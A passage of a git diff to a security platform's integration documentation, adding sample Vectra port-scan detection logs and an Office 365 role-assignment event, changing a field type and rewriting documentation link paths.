+ + === "vectra_threat1.json" ```json @@ -1938,7 +2046,7 @@ The following table lists the fields that are extracted, normalized under the EC |`vectra.detection.normal_servers` | `keyword` | The normal servers observed. | |`vectra.detection.num_attempts` | `keyword` | The number of attempts | |`vectra.detection.port` | `keyword` | The external port used. | -|`vectra.detection.ports` | `long` | Ports scanned. | +|`vectra.detection.ports` | `keyword` | Ports scanned. | |`vectra.detection.product_id` | `keyword` | The unusual product ID. | |`vectra.detection.profile` | `object` | The detection profile associated with this host. | |`vectra.detection.protocol` | `keyword` | The external protocol used. | diff --git a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md index 9ad66cb42f..ace7de536e 100644 --- a/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md +++ b/_shared_content/operations_center/integrations/generated/bf8867ee-43b7-444c-9475-a7f43754ab6d_sample.md @@ -68,6 +68,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "vectra_several_ports_scanned_01" + + ``` + -: {"ports": "7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", "scans": 100, "successes": 0, "version": "8.5", "detection_id": 85003, "category": "RECONNAISSANCE", "severity": 0, "threat": 0, "certainty": 0, "d_type": "port_scan", "d_type_vname": "Port Scan", "triaged": true, "headend_addr": "1.2.3.4", "dvchost": "1.2.3.4", "href": "https://1.2.3.4/detections/85003?detail_id=2029813", "dd_dst_ip": "5.6.7.8", "dd_dst_port": 0, "dd_dst_dns": "", "dd_bytes_sent": 0, "dd_bytes_rcvd": 0, "mitre": ["T1046", "T1018", "T1072"], "host_name": "host", "host_ip": "3.4.5.6", "dd_proto": "tcp", "vectra_timestamp": "1721184242"} + ``` + + + +=== "vectra_several_ports_scanned_02" + + ``` + -: {"ports": "7-9,13,21-26,37,53,79-81,88,106,110-113,119,135,139-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993-995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157", "scans": 100, "successes": 0, "version": "8.5", "detection_id": 85003, "category": "RECONNAISSANCE", "severity": 0, "threat": 0, "certainty": 0, "d_type": "port_scan", "d_type_vname": "Port Scan", "triaged": true, "headend_addr": "1.2.3.4", "dvchost": "1.2.3.4", "href": "https://1.2.3.4/detections/85003?detail_id=2029784", "dd_dst_ip": "5.6.7.8", "dd_dst_port": 0, "dd_dst_dns": "", "dd_bytes_sent": 0, "dd_bytes_rcvd": 0, "mitre": ["T1046", "T1018", "T1072"], "host_name": "host", "host_ip": "3.4.5.6", "dd_proto": "tcp", "vectra_timestamp": "1721183706"} + ``` + + + === "vectra_threat1" ``` diff --git a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md index b2c114378d..be558f7f25 100644 --- a/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md +++ b/_shared_content/operations_center/integrations/generated/c10307ea-5dd1-45c6-85aa-2a6a900df99b.md @@ -37,7 +37,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth.json" diff --git a/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md b/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md index e03ecd7455..f0754f5641 100644 --- a/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md +++ b/_shared_content/operations_center/integrations/generated/c20528c1-621e-4959-83ba-652eca2e8ed0.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ActorType1.json" diff --git a/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md b/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md index df3bc1f686..ad634bd338 100644 --- a/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md +++ b/_shared_content/operations_center/integrations/generated/c2faea65-1eb3-4f3f-b895-c8769a749d45.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_corp_audit_log_1.json" diff --git a/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md b/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md index af82354abb..5cff811124 100644 --- a/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md +++ b/_shared_content/operations_center/integrations/generated/c3888137-b34e-4526-ab61-836b2d45a742.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "accept.json" diff --git a/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md b/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md index ff916683d3..79d5d445b9 100644 --- a/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md +++ b/_shared_content/operations_center/integrations/generated/c6a43439-7b9d-4678-804b-ebda6756db60.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_1.json" diff --git a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md index 9d3ce3780d..6d653bb9f6 100644 --- a/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md +++ b/_shared_content/operations_center/integrations/generated/caa13404-9243-493b-943e-9848cadb1f99.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ad.json" @@ -121,7 +121,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\":\"2023-08-22T13:51:38\",\"Id\":\"3e4f9ff8\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"12b674a1\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"5bd75e5d\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"1.2.3.4\",\"ObjectId\":\"16aeb910\",\"UserId\":\"jone.doe@user.fr\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\":[{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Token\"}],\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"5bd75e5d\",\"Type\":0},{\"ID\":\"joe.doe@user.fr\",\"Type\":5}],\"ActorContextId\":\"12b674a1\",\"ActorIpAddress\":\"1.2.3.4\",\"InterSystemsId\":\"d8254b84\",\"IntraSystemId\":\"3e4f9ff8\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"16aeb910\",\"Type\":0}],\"TargetContextId\":\"12b674a1\",\"ApplicationId\":\"1b3c667f\",\"DeviceProperties\":[{\"Name\":\"OS\",\"Value\":\"Windows10\"},{\"Name\":\"BrowserType\",\"Value\":\"Edge\"},{\"Name\":\"IsCompliantAndManaged\",\"Value\":\"False\"},{\"Name\":\"SessionId\",\"Value\":\"8e2cdebf\"}],\"ErrorNumber\":\"0\"}", + "message": "{\"CreationTime\": \"2023-08-22T13:51:38\", \"Id\": \"3e4f9ff8\", \"Operation\": \"UserLoggedIn\", \"OrganizationId\": \"12b674a1\", \"RecordType\": 15, \"ResultStatus\": \"Success\", \"UserKey\": \"5bd75e5d\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ClientIP\": \"1.2.3.4\", \"ObjectId\": \"16aeb910\", \"UserId\": \"jone.doe@user.fr\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"ResultStatusDetail\", \"Value\": \"Success\"}, {\"Name\": \"UserAgent\", \"Value\": \"Mozilla/5.0\"}, {\"Name\": \"RequestType\", \"Value\": \"OAuth2:Token\"}], \"ModifiedProperties\": [], \"Actor\": [{\"ID\": \"5bd75e5d\", \"Type\": 0}, {\"ID\": \"joe.doe@user.fr\", \"Type\": 5}], \"ActorContextId\": \"12b674a1\", \"ActorIpAddress\": \"1.2.3.4\", \"InterSystemsId\": \"d8254b84\", \"IntraSystemId\": \"3e4f9ff8\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"16aeb910\", \"Type\": 0}], \"TargetContextId\": \"12b674a1\", \"ApplicationId\": \"1b3c667f\", \"DeviceProperties\": [{\"Name\": \"OS\", \"Value\": \"Windows10\"}, {\"Name\": \"BrowserType\", \"Value\": \"Edge\"}, {\"Name\": \"IsCompliantAndManaged\", \"Value\": \"False\"}, {\"Name\": \"SessionId\", \"Value\": \"8e2cdebf\"}], \"ErrorNumber\": \"0\"}", "event": { "action": "UserLoggedIn", "category": [ @@ -212,12 +212,95 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "add_member_to_role.json" + + ```json + + { + "message": "{\"CreationTime\": \"2024-07-10T14:25:49\", \"Id\": \"b4f48141-a2fe-4d47-9f0d-f09f26307035\", \"Operation\": \"Add member to role.\", \"OrganizationId\": \"f35698e3-5049-4b7f-b26b-9e9784705086\", \"RecordType\": 8, \"ResultStatus\": \"Success\", \"UserKey\": \"key@example.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"AzureActiveDirectory\", \"ObjectId\": \"john.doe@example.com\", \"UserId\": \"admin@example.com\", \"AzureActiveDirectoryEventType\": 1, \"ExtendedProperties\": [{\"Name\": \"additionalDetails\", \"Value\": \"{}\"}, {\"Name\": \"extendedAuditEventCategory\", \"Value\": \"Role\"}], \"ModifiedProperties\": [{\"Name\": \"Role.ObjectID\", \"NewValue\": \"54fc7176-29ef-4b41-808f-3cdeb8010649\", \"OldValue\": \"\"}, {\"Name\": \"Role.DisplayName\", \"NewValue\": \"Global Administrator\", \"OldValue\": \"\"}, {\"Name\": \"Role.TemplateId\", \"NewValue\": \"ad1cbca4-efcc-4149-b4a2-aeb40412fe48\", \"OldValue\": \"\"}, {\"Name\": \"Role.WellKnownObjectName\", \"NewValue\": \"TenantAdmins\", \"OldValue\": \"\"}], \"Actor\": [{\"ID\": \"admin@example.com\", \"Type\": 5}, {\"ID\": \"100320029D963D0D\", \"Type\": 3}, {\"ID\": \"User_576409b5-84f3-4791-8e3c-c9677e3bd898\", \"Type\": 2}, {\"ID\": \"576409b5-84f3-4791-8e3c-c9677e3bd898\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}], \"ActorContextId\": \"f35698e3-5049-4b7f-b26b-9e9784705086\", \"InterSystemsId\": \"5a0910e4-c125-4b46-9616-0232d14915dc\", \"IntraSystemId\": \"fb6cd132-f8e8-4ec5-9a0b-4ec8397e1405\", \"SupportTicketId\": \"\", \"Target\": [{\"ID\": \"User_46522b15-1bf5-4bed-8a6c-4edc58c05b23\", \"Type\": 2}, {\"ID\": \"46522b15-1bf5-4bed-8a6c-4edc58c05b23\", \"Type\": 2}, {\"ID\": \"User\", \"Type\": 2}, {\"ID\": \"john.doe@example.com\", \"Type\": 5}, {\"ID\": \"100320029D9D1C86\", \"Type\": 3}], \"TargetContextId\": \"f35698e3-5049-4b7f-b26b-9e9784705086\"}", + "event": { + "action": "Add member to role.", + "category": [ + "iam" + ], + "code": "8", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-10T14:25:49Z", + "action": { + "id": 8, + "name": "Add member to role.", + "outcome": "success", + "target": "user" + }, + "office365": { + "audit": { + "object_id": "john.doe@example.com" + }, + "context": { + "correlation": { + "id": "5a0910e4-c125-4b46-9616-0232d14915dc" + }, + "modified_properties": [ + { + "Name": "Role.ObjectID", + "NewValue": "54fc7176-29ef-4b41-808f-3cdeb8010649", + "OldValue": "" + }, + { + "Name": "Role.DisplayName", + "NewValue": "Global Administrator", + "OldValue": "" + }, + { + "Name": "Role.TemplateId", + "NewValue": "ad1cbca4-efcc-4149-b4a2-aeb40412fe48", + "OldValue": "" + }, + { + "Name": "Role.WellKnownObjectName", + "NewValue": "TenantAdmins", + "OldValue": "" + } + ] + }, + "record_type": 8, + "result_status": "Success", + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "f35698e3-5049-4b7f-b26b-9e9784705086" + }, + "related": { + "user": [ + "admin@example.com" + ] + }, + "service": { + "name": "AzureActiveDirectory" + }, + "user": { + "email": "admin@example.com", + "id": "key@example.com", + "name": "admin@example.com" + } + } + + ``` + + === "automated_investigation_and_response.json" ```json { - "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": \"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": \"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\"}\", \"Actions\": [ \"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", + "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": \"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": \"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\"}\", \"Actions\": [\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", "event": { "action": "AirInvestigationData", "code": "64", @@ -292,7 +375,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": \"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": \"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\",\\\"Entities\\\": [{\\\"Urls\\\":[\\\"http://1.2.3.4\\\",\\\"http://1.2.3.5\\\"],\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"Subject\\\":\\\"subject_value\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.4\\\",\\\"Threats\\\":1,\\\"Sender\\\":\\\"test@test.test\\\",\\\"Recipient\\\":\\\"test1@test.test\\\"},{\\\"Urls\\\":[\\\"http://1.2.3.6\\\",\\\"http://1.2.3.7\\\"],\\\"SenderIP\\\":\\\"1.2.3.8\\\",\\\"Subject\\\":\\\"subject_value_1\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.9\\\",\\\"Threats\\\":2,\\\"Sender\\\":\\\"test3@test.test\\\",\\\"Recipient\\\":\\\"test4@test.test\\\"}]}\", \"Actions\": [ \"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", + "message": "{\"CreationTime\": \"2023-04-17T14:27:09\", \"Id\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"Operation\": \"AirInvestigationData\", \"OrganizationId\": \"774d3f25-d4cf-4544-811f-fdb0e60e9ffd\", \"RecordType\": 64, \"UserKey\": \"AirInvestigation\", \"UserType\": 4, \"Version\": 1, \"Workload\": \"AirInvestigation\", \"ObjectId\": \"60eaf0aa-edc3-4f8d-8275-bc82d9500e59\", \"UserId\": \"AirInvestigation\", \"DeepLinkUrl\": \"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:a10a976\", \"EndTimeUtc\": \"2023-04-17T14:27:07\", \"InvestigationId\": \"urn:ZappedUrlInvestigation:a10a976d-6e3e-4d10-be50-4907183b6f86\", \"InvestigationName\": \"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:a1\", \"InvestigationType\": \"ZappedUrlInvestigation\", \"LastUpdateTimeUtc\": \"2023-04-17T14:21:59\", \"RunningTime\": 931, \"StartTimeUtc\": \"2023-04-17T14:11:38\", \"Status\": \"Remediated\", \"Data\": \"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"OATP\\\",\\\"AlertType\\\":\\\"alert_type_value\\\",\\\"Status\\\":\\\"status_value\\\",\\\"Severity\\\":\\\"severity_value\\\",\\\"IsIncident\\\":true,\\\"CorrelationKey\\\":\\\"correlation_key_value\\\",\\\"Category\\\":\\\"category_value\\\",\\\"SourceAlertType\\\":\\\"source_alert_type_value\\\",\\\"MachineName\\\":\\\"machine_name_value\\\",\\\"Entities\\\": [{\\\"Urls\\\":[\\\"http://1.2.3.4\\\",\\\"http://1.2.3.5\\\"],\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"Subject\\\":\\\"subject_value\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.4\\\",\\\"Threats\\\":1,\\\"Sender\\\":\\\"test@test.test\\\",\\\"Recipient\\\":\\\"test1@test.test\\\"},{\\\"Urls\\\":[\\\"http://1.2.3.6\\\",\\\"http://1.2.3.7\\\"],\\\"SenderIP\\\":\\\"1.2.3.8\\\",\\\"Subject\\\":\\\"subject_value_1\\\",\\\"P1SenderDomain\\\":\\\"http://1.2.3.9\\\",\\\"Threats\\\":2,\\\"Sender\\\":\\\"test3@test.test\\\",\\\"Recipient\\\":\\\"test4@test.test\\\"}]}\", \"Actions\": [\"{\\\"$id\\\":\\\"1\\\",\\\"ActionId\\\":\\\"urn:EmailZapper:8ad9417586e14790ba2afed0a7840e65\\\"}\"]}", "event": { "action": "AirInvestigationData", "code": "64", @@ -525,7 +608,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"xxxxxxx\",\"CorrelationId\":\"xxxxxxx\",\"UniqueTokenId\":\"xxxxxxx\"},\"CreationTime\":\"2023-12-13T10:08:25\",\"Id\":\"xxxxxxx\",\"Operation\":\"ListViewed\",\"OrganizationId\":\"xxxxxxx\",\"RecordType\":36,\"UserKey\":\"i:0h.f|membership|xxxxxxx@test.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"SharePoint\",\"ClientIP\":\"0.0.0.0\",\"UserId\":\"user@test.io\",\"AuthenticationType\":\"FormsCookieAuth\",\"BrowserName\":\"Chrome\",\"BrowserVersion\":\"102.0.5005.197\",\"CorrelationId\":\"xxxxxxx\",\"EventSource\":\"SharePoint\",\"IsManagedDevice\":false,\"ItemType\":\"List\",\"ListId\":\"xxxxxx\",\"Platform\":\"WinDesktop\",\"Site\":\"xxxxxx\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.6.00.29964 Chrome/102.0.5005.197 Electron/19.1.8 Safari/537.36\",\"WebId\":\"xxxxxx\",\"DeviceDisplayName\":\"xxxxxx\",\"CustomizedDoclib\":false,\"FromApp\":true,\"ItemCount\":102,\"ListBaseTemplateType\":\"101\",\"ListBaseType\":\"DocumentLibrary\",\"ListColor\":\"\",\"ListIcon\":\"\",\"Source\":\"Unknown\",\"TemplateTypeId\":\"\",\"ListTitle\":\"xxxxxx\",\"ObjectId\":\"https://domain.com/subdomain/xxxxxx\"}", + "message": "{\"AppAccessContext\": {\"AADSessionId\": \"xxxxxxx\", \"CorrelationId\": \"xxxxxxx\", \"UniqueTokenId\": \"xxxxxxx\"}, \"CreationTime\": \"2023-12-13T10:08:25\", \"Id\": \"xxxxxxx\", \"Operation\": \"ListViewed\", \"OrganizationId\": \"xxxxxxx\", \"RecordType\": 36, \"UserKey\": \"i:0h.f|membership|xxxxxxx@test.com\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"SharePoint\", \"ClientIP\": \"0.0.0.0\", \"UserId\": \"user@test.io\", \"AuthenticationType\": \"FormsCookieAuth\", \"BrowserName\": \"Chrome\", \"BrowserVersion\": \"102.0.5005.197\", \"CorrelationId\": \"xxxxxxx\", \"EventSource\": \"SharePoint\", \"IsManagedDevice\": false, \"ItemType\": \"List\", \"ListId\": \"xxxxxx\", \"Platform\": \"WinDesktop\", \"Site\": \"xxxxxx\", \"UserAgent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Teams/1.6.00.29964 Chrome/102.0.5005.197 Electron/19.1.8 Safari/537.36\", \"WebId\": \"xxxxxx\", \"DeviceDisplayName\": \"xxxxxx\", \"CustomizedDoclib\": false, \"FromApp\": true, \"ItemCount\": 102, \"ListBaseTemplateType\": \"101\", \"ListBaseType\": \"DocumentLibrary\", \"ListColor\": \"\", \"ListIcon\": \"\", \"Source\": \"Unknown\", \"TemplateTypeId\": \"\", \"ListTitle\": \"xxxxxx\", \"ObjectId\": \"https://domain.com/subdomain/xxxxxx\"}", "event": { "action": "ListViewed", "code": "36", @@ -586,12 +669,66 @@ This section 